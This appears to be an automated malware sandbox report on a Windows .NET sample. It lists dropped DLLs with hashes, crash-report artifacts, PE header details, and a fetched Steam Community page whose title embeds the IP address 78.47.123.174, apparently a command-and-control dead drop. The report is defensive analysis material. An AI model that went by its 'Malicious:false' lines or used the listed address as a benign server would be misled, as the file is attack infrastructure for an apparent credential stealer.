                                                                                        • Filename: SecuriteInfo.com.Trojan.PWS.Steam.37259.28451.11337.exe, Detection: malicious
                                                                                        • Filename: a6lzHWp4pa.exe, Detection: malicious
                                                                                        • Filename: file.exe, Detection: malicious
                                                                                        • Filename: file.exe, Detection: malicious
                                                                                        • Filename: file.exe, Detection: malicious
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):608080
                                                                                        Entropy (8bit):6.833616094889818
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                        MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                        SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                        SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                        SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                        Malicious:false
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Joe Sandbox View:
                                                                                        • Filename: BI6oo9z4In.exe, Detection: malicious
                                                                                        • Filename: file.exe, Detection: malicious
                                                                                        • Filename: btCbrSS2Je.exe, Detection: malicious
                                                                                        • Filename: 7urUz64I0Y.exe, Detection: malicious
                                                                                        • Filename: file.exe, Detection: malicious
                                                                                        • Filename: SecuriteInfo.com.Trojan.PWS.Steam.37259.28451.11337.exe, Detection: malicious
                                                                                        • Filename: a6lzHWp4pa.exe, Detection: malicious
                                                                                        • Filename: file.exe, Detection: malicious
                                                                                        • Filename: file.exe, Detection: malicious
                                                                                        • Filename: file.exe, Detection: malicious
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):450024
                                                                                        Entropy (8bit):6.673992339875127
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                        MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                        SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                        SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                        SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                        Malicious:false
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):2046288
                                                                                        Entropy (8bit):6.787733948558952
                                                                                        Encrypted:false
                                                                                        SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                        MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                        SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                        SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                        SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                        Malicious:false
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):257872
                                                                                        Entropy (8bit):6.727482641240852
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                        MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                        SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                        SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                        SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                        Malicious:false
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):80880
                                                                                        Entropy (8bit):6.920480786566406
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                        MD5:A37EE36B536409056A86F50E67777DD7
                                                                                        SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                        SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                        SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                        Malicious:false
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):65536
                                                                                        Entropy (8bit):1.066159737600463
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:rp88kXkY340BU/aa6FOzuiFYZ24IO8Il:d88kXkYjBU/aaBzuiFYY4IO8Il
                                                                                        MD5:49A07728795917A93AA5A985337B0480
                                                                                        SHA1:CA48FC30A630C6BC8EFF9DAC0CD102F9EAC687C4
                                                                                        SHA-256:08CA2D44D6F9D27386B2DB062073D09FEF20698628ED97BD1043EF0FD30FED0B
                                                                                        SHA-512:E67D99DDC07714DA83366A6BA89D477854C53C9D7BAC4E962BA16F0707CB9E8A76C42978B641F41038EBA55D22E56AB79E4C0E46A9817819E0D2D38423F4A990
                                                                                        Malicious:false
                                                                                        Preview:Version=1 EventType=CLR20r3 EventTime=133610128203339699 ReportType=2 Consent=1 UploadTime=133610128215370973 ReportStatus=524384 ReportIdentifier=5fcda2fd-16a2-440e-898a-8104453ba001 IntegratorReportIdentifier=413a9111-6cae-440c-8f8c-95572f983cda Wow64Host=34404 Wow64Guest=332 NsAppName=SecuriteInfo.com.Win32.Malware-gen.198.6512.exe OriginalFilename=portableneweurope_hub8.exe AppSessionGuid=000019b4-0001-0014-058c-5625b4adda01 TargetAppId=W:0006bf848700ad3a9573a837213d16f9fe2600
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Mini DuMP crash report, 15 streams, Fri May 24 08:27:00 2024, 0x1205a4 type
                                                                                        Category:dropped
                                                                                        Size (bytes):220569
                                                                                        Entropy (8bit):3.561915889160963
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:+/pr4xIuBojRdpN4uE2aOhO5LTgViSVXoy2A8uf0hxOCDXtTAhZ4a8lT:+x3R4uEqheLTgwyCzN9i4H
                                                                                        MD5:0CF4D34E47FEE0FB97EE37308722874C
                                                                                        SHA1:370A32D5E588E7640D670D0D8299EED4FD7B8F51
                                                                                        SHA-256:133BE8A9AA2567599B0B0A03998DA1F589E1E1351BCF94FEB016082729780DC8
                                                                                        SHA-512:DB1D1C5AA588C865F79E8A85C6AD5687B19395975BFF672379B449244D3333910866B541D22D3218806449B17E9D86BEF98CA2FE338D90D8A5BA0D7F4238575E
                                                                                        Malicious:false
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):8520
                                                                                        Entropy (8bit):3.7038570432957667
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:R6l7wVeJYc6K6Y9vSU9y+sgmfZxU+prj89baLysfAdUzm:R6lXJT6K6YFSU9y+sgmfvUnaLxfAaq
                                                                                        MD5:F6AB8B0A2CAB1C6DCE1F202453E8A7B6
                                                                                        SHA1:1496AE207D3D7C0000FA4F7E29AF8DB75A29F474
                                                                                        SHA-256:DE6FC0E148E5291FB9B0316DF91F3FA4B1B73ADDE9BFB2B2BA407D4F9BBB8F7F
                                                                                        SHA-512:1B8C0A18EACB91DB07A7A7DB0C81ED0D6D902768EB3CED99C799D652E5EC62922F854BC1DC1D5ED3BB161A1B4DEA2134C595F2BBC369727688C8E02D148D6567
                                                                                        Malicious:false
                                                                                        Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>...<OSVersionInformation>....<WindowsNTVersion>10.0</WindowsNTVersion>....<Build>19045</Build>....<Product>(0x30): Windows 10 Pro</Product>....<Edition>Professional</Edition>....<BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>....<Revision>2006</Revision>....<Flavor>Multiprocessor Free</Flavor>....<Architecture>X64</Architecture>....<LCID>2057</LCID>...</OSVersionInformation>...<ProcessInformation>....<Pid>6580</Pi
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):4911
                                                                                        Entropy (8bit):4.569597999494528
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:cvIwWl8zs5uJg77aI9vMWpW8VYuoYm8M4J+bF4QsFjf+q8vybF4Qtv4uX3d:uIjfyI7Nl7VjJ+pOKypdAuX3d
                                                                                        MD5:B48BBD3B14487E20904911964CE31941
                                                                                        SHA1:F6D30B992AC4F7EDC888E3C4DB78F7A45913A4D6
                                                                                        SHA-256:F4656C8EBDE285001D96B8AC10B748E131AAA536903515577B847F9DF3D0B0B2
                                                                                        SHA-512:7EB3B5BEF04453DC70640237682524D28D8C3596333C0C1A6702325A9533BA9A5A9B9DC25F4572B81B9E2AE5145CB425B0D37BE2CFB05B829CAFF47D8EE970DE
                                                                                        Malicious:false
                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="336929" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:modified
                                                                                        Size (bytes):522
                                                                                        Entropy (8bit):5.358731107079437
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:Q3La/hz92n4M9tDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLU84qpE4KlKDE4KhKiKhk
                                                                                        MD5:93E4C46884CB6EE7CDCC4AACE78CDFAC
                                                                                        SHA1:29B12D9409BA9AFE4C949F02F7D232233C0B5228
                                                                                        SHA-256:2690023A62F22AB7B27B09351205BA31173B50B77ACA89A5759EDF29A1FB17F7
                                                                                        SHA-512:E9C3E2FCEE4E13F7776665295A4F6085002913E011BEEF32C8E7065140937DDE1963182B547CC75110BF32AE5130A6686D5862076D5FFED9241F183B9217FA4D
                                                                                        Malicious:false
                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3063), with CRLF, LF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):35682
                                                                                        Entropy (8bit):5.381184679792834
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:j7pqLtWYmwt5D0gqOciNGA7PzzgiJmDzJtxvrfukPco1AUmPzzgiJmDzJtxvJ2Sm:j78LtWYmwt5D0gqOcc7PzzgiJmDzJtxy
                                                                                        MD5:282216A64AA95276028CEEB327AEF8C0
                                                                                        SHA1:7415E650299D80FEC055F870FC3B9D9D93AA5376
                                                                                        SHA-256:E06A684F09A37740DDF459699B254332FBAFC7D13182D434BB4642BE63549A01
                                                                                        SHA-512:9A1DA25B0866FF28CEC347AA1B4E30CB5614E6CF02EE3559469483918DFE630A2E2A4B66694F98B2929394EA54F6C7AF763B73C7B14F1937118E2CAE66198136
                                                                                        Malicious:false
                                                                                        Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: r0is https://78.47.123.174|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=E0c90DJSB6Ld&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/css/globalv2.cs
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):2459136
                                                                                        Entropy (8bit):6.052474106868353
                                                                                        Encrypted:false
                                                                                        SSDEEP:49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
                                                                                        MD5:90E744829865D57082A7F452EDC90DE5
                                                                                        SHA1:833B178775F39675FA4E55EAB1032353514E1052
                                                                                        SHA-256:036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
                                                                                        SHA-512:0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
                                                                                        Malicious:false
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):685392
                                                                                        Entropy (8bit):6.872871740790978
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                        MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                        SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                        SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                        SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                        Malicious:false
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):608080
                                                                                        Entropy (8bit):6.833616094889818
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                        MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                        SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                        SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                        SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                        Malicious:false
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):450024
                                                                                        Entropy (8bit):6.673992339875127
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                        MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                        SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                        SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                        SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                        Malicious:false
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):2046288
                                                                                        Entropy (8bit):6.787733948558952
                                                                                        Encrypted:false
                                                                                        SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                        MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                        SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                        SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                        SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                        Malicious:false
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):257872
                                                                                        Entropy (8bit):6.727482641240852
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                        MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                        SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                        SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                        SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                        Malicious:false
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):80880
                                                                                        Entropy (8bit):6.920480786566406
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                        MD5:A37EE36B536409056A86F50E67777DD7
                                                                                        SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                        SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                        SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                        Malicious:false
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):760320
                                                                                        Entropy (8bit):6.561572491684602
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:wCMz4nuvURpZ4jR1b2Ag+dQMWCD8iN2+OeO+OeNhBBhhBBgoo+A1AW8JwkaCZ+36:wCs4uvW4jfb2K90oo+C8JwUZc0
                                                                                        MD5:544CD51A596619B78E9B54B70088307D
                                                                                        SHA1:4769DDD2DBC1DC44B758964ED0BD231B85880B65
                                                                                        SHA-256:DFCE2D4D06DE6452998B3C5B2DC33EAA6DB2BD37810D04E3D02DC931887CFDDD
                                                                                        SHA-512:F56D8B81022BB132D40AA78596DA39B5C212D13B84B5C7D2C576BBF403924F1D22E750DE3B09D1BE30AEA359F1B72C5043B19685FC9BF06D8040BFEE16B17719
                                                                                        Malicious:false
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                        Category:dropped
                                                                                        Size (bytes):1835008
                                                                                        Entropy (8bit):4.465966167520397
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:PIXfpi67eLPU9skLmb0b4DWSPKaJG8nAgejZMMhA2gX4WABl0uNwdwBCswSb+:gXD94DWlLZMM6YFHS++
                                                                                        MD5:2E9126E56776E715D6FF2B742D50FEFA
                                                                                        SHA1:606D3A904AF9055774FF08EB0043ED72E25750FF
                                                                                        SHA-256:7F64709E39387EF25868E9B71FC0F4A60555BB8706CA00D873C1D0D43A1AA1EB
                                                                                        SHA-512:B88BA7E1AE9E8E0F5633CE547C343B3EA086BB268F29E21486A17DA8BA428B0BFDE30F7C8ADE9FD962BDD05689ECB9EE90695EDDFA30A43B2F9AF8F14EAFBDA0
                                                                                        Malicious:false
                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Entropy (8bit):6.983386792126187
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                        • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                        File name:SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                                                                                        File size:5'039'032 bytes
                                                                                        MD5:3d5d6485af7cd75f9cb1284a35e70f97
                                                                                        SHA1:511388b6ef0247a952580e1aaa70e6e7646e35fb
                                                                                        SHA256:d9598915932030d8c05825ef9d1d331cbea8cb887aa6570f96d3cec23c311411
                                                                                        SHA512:c4340c7947b23b83c8acb2a08fdc599ad24fc891d9ac81e6b98b00509a681266d2f390cf7f10123504b4bffdf77a0108cd6249ca7272ac4f4bcd0d106b406e4a
                                                                                        SSDEEP:98304:pSnTPjsgAvcAbjUTRl92dXeYbFhGLhWQDf6Z1a51:pSnT7bAEAbjUvoDhGLAaj
                                                                                        TLSH:6D369D12B7488A71C14C26B6D2E3451D43B1AD843BB6CF5B366D73B91E2339BCC4636A
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,3L...............P...G.........^.G.. ....G...@.. ........................L.......M...@................................
                                                                                        Icon Hash:6febb3bb3b10c030
                                                                                        Entrypoint:0x87cc5e
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:true
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0xA24C332C [Fri Apr 14 01:53:48 2056 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:4
                                                                                        OS Version Minor:0
                                                                                        File Version Major:4
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:4
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                        Signature Valid:false
                                                                                        Signature Issuer:
                                                                                        Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                        Error Number:-2146762487
                                                                                        Not Before, Not After
                                                                                        • 21/05/2024 12:03:33 22/05/2034 12:03:33
                                                                                        Subject Chain
                                                                                        Version:3
                                                                                        Thumbprint MD5:133BCC878AB8FE98D61639E2A504C83B
                                                                                        Thumbprint SHA-1:A9B4F9AE835831BC5973CD5899CC47F1A36551EB
                                                                                        Thumbprint SHA-256:C3B801C3C23D8ECEB77DFA5405A7078F87329FA0EDF1A020411E8D9FF1653139
                                                                                        Serial:17AF9D8571465F984BFD5F8EF5675FE5
                                                                                        Instruction
                                                                                        jmp dword ptr [00402000h]
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x47cc10 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x47e000 | 0x4d48c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x4c8800 | 0x5bb8 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x4cc000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
